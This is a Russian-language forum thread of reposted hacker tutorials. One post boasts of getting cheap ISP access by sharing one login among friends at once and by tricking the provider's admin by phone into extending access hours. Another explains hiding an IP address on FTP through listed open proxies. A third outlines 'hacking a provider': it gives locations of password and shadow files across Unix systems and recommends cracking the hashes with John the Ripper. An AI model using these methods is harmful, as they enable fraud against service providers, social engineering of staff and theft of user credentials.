При слове "халявный Инет" ты вспоминаешь злобных троянчиков, расшаренные винты и глупых юзеров с паролями qwerty? Ну-ну, вспоминай, а я сейчас тебе расскажу, как я поимел реальную халяву со своего прова, не обманывая глупых, но несчастных юзеров. Да и вообще, я не понимаю: зачем взламывать что-то или кого-то, когда есть легальные способы сэкономить на Инете. Весь мой рассказ будет построен на моем личном опыте, поэтому можешь быть уверен, что я это знаю не понаслышке.

Выборы 2000

Первое, что ты должен сделать - это правильно выбрать провайдера. Чем правильнее будет твой выбор, тем больше денег ты сэкономишь. Если ты живешь в крупном городе, то у тебя никаких проблем не возникнет: в течение месяца можно легко вычислить провайдика, который будет удовлетворять (в хорошем смысле слова) твоим требованиям.

Итак, основное условие, которое я поставил своему избраннику - он должен быть не самым крупным в городе, но и не самым мелким. Тебе советую того же - держись золотой середины, потому как у больших ISP есть опыт работы с такими халявщиками, как ты, и, соответственно, иммунитет от тебя. :) А у мелких настолько слабая база для халявщика, что даже как-то неприлично.

Провик должен предоставлять пакеты доступа, такие как "неограниченный доступ ночью за ХХХ сумму" или нечто подобное. Наверно, это одно из самых главных условий.

Самый легкий и самый простой способ сэкономить зеленых президентов - это установка локального прокси-сервера. Я выбрал WinProxy. Ты выбрал себе прокси, теперь надо только сброситься с друзьями (лучше 3-4 человека из твоей локалки), подключиться к провику и всем пихаться через одну дырку во всемирную сетку. Вот так я и поступил с корефанами, взяв неограниченный доступ ночью за 12 баксов.

Через пару дней мне стало не хватать скорости, впрочем, как и не хватит тебе при таком раскладе. Через три дня я пошел потусоваться с друганами, пивка подтянуть, девочек поклеить. Зная, что после всего этого буду нетрезв, я оставил логин и пароль от ночного Инета соседу. В ту ночь он без проблем смог подсоединиться и полазить по сети через мой логин. После будуна до меня доперло: у прова отсутствовали определители номеров, и можно было лазать в Инет из-под одного логина, мне и моим корефанам, с единственным условием - не коннектиться в сеть одновременно.

Узнав сей факт, мы решили распределить всю ночь на троих: каждый лазал в Инете в строго отведенное ему время. Но мне опять стало мало, и я решил попробовать одновременно подключиться с разных телефонов по одному логину. И опять эта фишка прокатила на "ура". Это означало, что у прова не учитывается количество подключенных с одного логина. Глупый провайдерчик думал, что в сети только один чел с моим логином.
Так мы наклоняли моего провайдера в течение двух месяцев: шестеро корефанов обнимались со своей палочкой-выручалочкой с 0:00 до 8:00 и платили всего 2 бакса с рыла. Нехилая экономия? Я так и думал, что ты со мной согласишься. Самое главное - не было никакого взлома. Все просто и, главное, легально (не учитывая то, что в полиси прова написано о том, что при Night surf`e в Инете может находиться только один чел. ;)
Но мне опять стало мало. Я решил пойти на крайние меры. Кто не рискует - тот не писается в трусики, а трусики именно для этого и предназначены, особенно если они с крылышками. Но об этом по порядку.

Высшая мера наказания провайдера

Я забыл тебе рассказать, как получать доступ днем, если ты сидишь на плане ночного Инета (на план лучше не садись). ;) Объясняю. Если хочешь забрать почту или в очередной раз обнять свою палочку, глядя на голых девок, то тебе нужно пройти следующие круги ада:

1. Позвонить администратору своего прова, лучше всего в конце рабочего дня. Приблизительно в 17:00 - 18:00.

2. Прикидываясь унитазным шлангом, сказать что-то типа:

"Извините, мы не местные, в договоре написано, что я могу воспользоваться вашими услугами по настройке, если у меня возникнут проблемы. У меня почему-то возникают проблемы при дозвоне".

Админ попросит рассказать: чё за проблемс у тебя, паца? Если так, то начинаешь жаловаться на плохую связь или на "не ответы сервера". Админ начнет тебя грузить: надо жать на пимпу, дергануть загогулину и все будет пинцетно.

3. Внимательно выслушиваешь админа. Понимающе поддакиваешь, но ничего не делаешь из того бреда, что он скажет.

4. Перед тем как повестить трубку, ты спрашиваешь: "А можно мне сейчас попробовать?". Админ, с 90%-ой вероятностью, ответит: "ДА". Вот тут не теряйся и спроси: "А меня пустят, у меня ведь доступ только ночью?".

5. Все. Считай, что у тебя есть доступ в Инет. Админ просто не сможет тебе отказать. Если ты хочешь, чтобы такую халяву можно было поднять в дальнейшем, обязательно предупреди админа, что если у тебя что-то не получится, ты перезвонишь завтра.

Теперь ты можешь забрать очередную почту. Только советую долго не задерживаться в Инете. Тебе нельзя долго светиться, если хочешь улучшить свое положение.

Так, теперь сделай передышку. Два наклона вперед и два назад, 20 приседаний, 50 отжиманий, 100 подтягиваний на турнике. Готов продолжать? Ну, тогда поехали. На следующий день попробуй войти в Инет. Если не получилось, то опять позвони админу и снова прикинься шлангом, только потолще. Для чего это надо? Ты думаешь, что это нужно, чтобы снова почту скачать? Ни хрена подобного. Админы очень ленивые и очень занятые люди. И на второй или третий раз админ забудет заблокировать тебе доступ. Вероятность этого будет выше, если ты послушал меня и звонил в конце рабочего дня.

Я тебе отвечаю на зубы дядюшки Билли Гейтса, что у меня это прошло с первого раза. Конечно, тут есть определенный момент везения, но... у хацкера все получится железно! А теперь посмотрим, что будет, если админ забудет заблокировать тебе доступ:

1. Доступ в основном описывается одной строкой, то есть с 0:00 до 8:00.

2. Когда админ, после твоего звонка, откроет доступ, то он не сможет добавить еще одну строку, а исправит существующую. Это значит, что твой доступ станет с 0:00 до 19:00.

Именно такой доступ я имел в течение двух месяцев, около года назад. Почему так не долго? Нет, меня не вычислили, я просто забыл заплатить. ;) А потом я просто сменил прова, чтобы не светиться у старого. Как видишь, вполне реально получить за 2 бакса доступ практически на 24 часа в сутки. Все зависит от лености админа. В подкрепление реальности моего метода сообщу, что после меня такую фишку проделывали ещё несколько челов. И все поднимали халяву, хорошую халяву. Админ - тоже человек (несмотря на всю парадоксальность мысли),и он такой же ленивый, как и ты.
И что я с этого получу?

Пора мне уже подвести итоги. Для получения практически халявного доступа тебе надо:

1. Позвонить админу и рассказать сказку о сером козленке.

2. На следующий день проверить коннект. Если его нет, то возвращаешься к пункту (1) и на этот раз пересказываешь админу "Войну и мир". Если опять не поможет, то попробуй прочитать админу полное собрание сочинений Ленина.

Даже если у тебя это не прокатит, не огорчайся. Ты же все-таки получил халявный доступ днем.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:50. Заголовок: Re:


По FTP без следов
Пyтешествyя по Интеpнетy, мы часто не дyмаем о том, что оставляем следы своих посещений каждый pаз, когда заходим на какой-либо ftp сайт. Стандаpтные log-файлы любопытных владельцев способны yзнать о вас многое, и пpежде всего ваш IP адpес, что pавнозначно напpимеp томy что yзнали ваш телефон.
Сyществyет несколько способов защитить свое privacy от подобных посягательств.

Способ 1: Пpокси Анонимизиpовать пyтешествие по сети можно с помощью пpокси сеpвеpа. Пpокси сеpвеp pаботает, по сyти, как Анонимайзеp, т.е. докyмент с сайта "забиpает" он, а не вы. Большинство пpокси сеpвеpов огpаничивают достyп на основании IP адpеса, с котоpого пpиходит обpащение. Иными словами, если вы пользyетесь пpовайдеpом Demos, то пpокси сеpвеp Glasnet вас к себе попpостy не пyстит. Hо к счастью, в сети всегда можно найти "добpый" пpокси, владельцы котоpого либо откpыто заявляют о его достyпности для всех желающих (напpимеp этот), либо пpокси, котоpый по той или иной пpичине не огpаничивает достyп только своим доменом, о чем шиpокой пyблике не известно, напpимеp:
name: port:
svc.logan.k12.ut.us 8001
proxy1.emirates.net.ae 8080
proxy.sysnet.it 8080
www.archmate.com.tw 3128
www-proxy.global-one.ru 3333
sunsite.cs.msu.su 3128
www.anonymizer.com 8080
squid.nlanr.net 3128

Для настpойки FTP клиентов как пpавило пpокси-сеpвеp надо yстановить в passive pежим. Пpоделав этy нехитpyю опеpацию, вы сможете пyтешествовать по сети, оставляя след как болгаpский или амеpиканский пользователь, но... тyт есть один очень важный момент. Далеко не все пpокси сеpвеpы являются полностью анонимными. Hекотоpые из них позволяют администpатоpy сайта, котоpый вы посещаете с использованием пpокси, пpи желании опpеделить IP адpес, с котоpого пpоисходит обpащение к пpокси, т.е. ваш pеальный IP адpес. Пpовеpьте свой пpокси на пpедмет его полной или неполной анонимности: http://www.tamos.com/bin/proxy.cgi
скоро функция проверки proxy будет доступна на нашем сайте.
Если вы полyчите сообщение Proxy server is detected! - ваш пpокси имеет "дыpy", и вам бyдет пpедоставлена инфоpмация о вашем pеальном IP адpесе, как впpочем и об IP адpесе пpокси сеpвеpа, котоpый вы использyете. Если же сообщение гласит Proxy server is not detected - все в поpядке! Рекомендyется пеpиодически (не pеже чем pаз в месяц) пpовеpять те пpокси с котоpыми в pаботаете на пpедмет анонимности.
В заключение еще несколько сообpажений касательно использования пpокси сеpвеpов. Работа чеpез далеко pасположенный пpокси снижает скоpость пеpедачи данных и вpемя ожидания. Кpоме того, автоp HЕ pекомендyет использовать пpиведенные выше адpеса пpокси, посколькy если все читатели станyт их использовать, то очень скоpо yдовольствие кончится и достyп к ним бyдет закpыт (если yже не закpыт).
Hайдите свой пpокси сами, это несложно. Автоp нашел эти адpеса за 5 минyт. В Альтависте набеpите ключевые слова, что-нибyдь вpоде proxy+server+configuration+Netscape, и вы полyчите список стpаниц, где пpовайдеpы pассказывают своим пользователям, как настpоить их бpаyзеpы для pаботы с пpокси.
Пpобyйте все подpяд, на пятый или седьмой pаз вас ждет yдача - пpокси согласится с вами pаботать.

Способ 2: Стиpайте содеpжимое кэша.
Большинство FTP клиентов сохpаняют в специальной диpектоpии все те места в Интеpнет где
вы были (а иногда сохpаняют и нешифpованные имена и паpоли). В целях вашей безопасности целесообpазно пеpиодически (скажем либо каждый день, либо pаз в неделю) стиpать содеpжимое кэша. Hапpимеp в Bullet Proof FTP (лyчшей на наш взгляд пpогpамме, ее можно скачать на http://www.bpftp.com) он pасполагается в диpектоpии: Cache. Лyчше пpоизводить невосстановимое стиpание, напpимеp с помощью пpогpаммы Kremlin 2.1.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:51. Заголовок: Re:


Как хакнуть провайдера
Итак, давайте разберемся, что такое хакинг. Как известно, все программы не идеальны, то есть они не защищены от наличия ошибок (багов/bugs). Значит, мы можем воспользоваться недочетами системы, правильно?

Да! Бьюсь об заклад, что вам бешено хочется скорее узнать о том, как бы "хакнуть" провайдера и сидеть в инете на халяву. Ладно, я приоткрою для вас эту завесу и расскажу несколько основных принципов взлома и о взломе прова вообще.

Во-первых, надо узнать, на какой платформе стоит провайдер. Сделать это можно обычной утилитой ftp, которая входит в состав Виндов (Windows). Итак, присоединяемся к прову по ftp. Делается это так. К примеру, доменное имя вашего прова - glassnet.ru. Открываем Пуск/Выполнить и пишем ftp. Жмем enter. Поясняю: ftp - это утилита для перенесения файлов с компа на комп, то есть FileTransferProtocol. Итак, мы в невзрачном окне, и перед нами подсказка системы ftp. Пишем "open glasnet.ru" - что мы написали? Мы подсоединились к glasnet.ru, и все! Перед вами поле для ввода логина и пароля, но выше написано, в какой вы системе. Скорее всего, будет что-нибудь из UNIX'овских операционок. Вам, конечно же, нужен файл с паролями и логинами. Вот где он может быть:
Тип Юниха Место, где хранится нужный файл
AIX 3 /etc/security/passwd !/tcb/auth/files/[first letter #of username]/[username]
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO UNIX #.2.x /tcb/auth/files/[first letter* of username]/[username]
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow[optional NIS+ private secure maps/tables/whatever]
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *

Предположим, что вы установили тип ОС провайдера и взяли файл с паролями (о том, как его взять, мы поговорим позже). И что же вы видите: striker:5gg57G422dfhj:98:10:Striker:DjStriker:/home/sc/sun:/bin/bash Это что еще за монстр? А где пароль, а где логин? Объясняю: это можно перевести так:

1) Имя пользователя: Striker;
2) Расшифровка пароля: 5gg57G422dfhj;
3) Номер пользователя: 98;
4) Номер группы: 10;
5) Информация GECOS: DjStriker;
6) Каталог по умолчанию: /home/sc/sun
7) Shell: /bin/bash.

Да, но как расшифровать пароль? Да очень просто. Берем прогу под названием John The Ripper, эта прога перебирает все комбинации или пользуется готовым словарем возможных комбинаций. Хочу сразу предупредить, что пароли могут раскриптироваться довольно долго! Нормальные пароли типа he_!$*74 будут разгадываться лет пять!!! Не беспокойтесь, есть же и другие пароли у людей.

Прогу можно взять здесь: http://www.false.com/security/john/index.html или поищите ее на http://astalavista.box.sk

Ну, теперь о самом больном , о том, как бы взять этот файл от провайдера. Для начала надо обучиться UNIX грамотности. Я уже говорил, что каждый хакер должен знать UNIX, так вот вам несколько UNIX команд:
Примеры UNIX команд
at Показывается день/час, когда выполнится команда
batch Выполнение команд в процессе загрузки
chmod Этой командой вы можете изменить полномочия файлового доступа
chown Был у файла один хозяин , а стал другой
cron Это демон команд batch и at
crontab Можно указать промежутки времени, в течение которых будут выполнены какие-либо команды
ftp Работа с удаленным компом. Принимаем или пересылаем файлы
kill Послать некоторому процессу сигнал о конце работы
logname Получить регистрационное имя
pwcheck Проверить файл паролей (/etc/passwd - по умолчанию)
mail Прием или пересылка е-message
who Отобразить список текущих юзеров
telnet Доступ к удаленному компу
umask Маска полномочий для нового файла
news Отобразить статью из конфы Usenet
whois Получить инфу о текущем узере
write Переслать записку все тому же текущему юзеру
uux Выполнение команд UNIX на удаленном компе
nslookup Получить сведения об IP-адресе домена
uucp Копировать файлы из одного компа UNIX в другой
uuname Отобразить список хостов UUCP
su Если умело применить , то можно стать привилегированным пользователем Я точно не знаю о применении команды su
rm Стереть файл или каталог
sleep Не выполнять команду на данное время
passwd Создать/изменить пароль
ps* Посмотреть , какие процессы на данный момент активизированы

*Очень интересная команда: вы можете присоединиться к компу (если имеете на нем аккаунт) и набрать: к примеру, на компе сидит root, ps -x -u root и вы узнаете, что запущено в сети у root'a!


Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Ответов - 25 , стр: 1 2 3 All [только новые]
Ответ:
1 2 3 4 5 6 7 8 9
большой шрифт малый шрифт надстрочный подстрочный заголовок большой заголовок видео с youtube.com картинка из интернета картинка с компьютера ссылка файл с компьютера русская клавиатура транслитератор  цитата  кавычки моноширинный шрифт моноширинный шрифт горизонтальная линия отступ точка LI бегущая строка оффтопик свернутый текст

показывать это сообщение только модераторам
не делать ссылки активными
Имя, пароль:      зарегистрироваться    
Тему читают:
- участник сейчас на форуме
- участник вне форума
Все даты в формате GMT  3 час. Хитов сегодня: 16
Права: смайлы да, картинки да, шрифты да, голосования нет
аватары да, автозамена ссылок вкл, премодерация откл, правка нет